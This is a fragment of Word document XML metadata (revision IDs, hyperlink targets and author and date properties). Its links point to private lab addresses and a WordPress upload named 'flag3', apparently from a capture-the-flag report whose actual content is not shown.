    <w:rsid w:val="00472028"/>
    <w:rsid w:val="00506DCA"/>
    <w:rsid w:val="005A0C89"/>
    <w:rsid w:val="005D0A09"/>
    <w:rsid w:val="007B13CC"/>
    <w:rsid w:val="007F39CD"/>
    <w:rsid w:val="008F3FD5"/>
    <w:rsid w:val="009519CE"/>
    <w:rsid w:val="00A7098B"/>
    <w:rsid w:val="00BC0CB3"/>
    <w:rsid w:val="00C038E0"/>
    <w:rsid w:val="00C444D0"/>
    <w:rsid w:val="00F60ED9"/>
    <w:rsid w:val="00F6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CBD3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D70D0FEB-28BD-4F0A-B620-7150E6C91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23C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23C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23C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CF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23CF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3CF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23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098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19C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F3F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10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mailto:steven@192.168.1.110" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.110/wordpres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192.168.1.115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92.168.1.115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192.168.1.115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192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.p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92.168.1.110/wordpres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Gould</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Gould</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-15T16:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-17T00:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>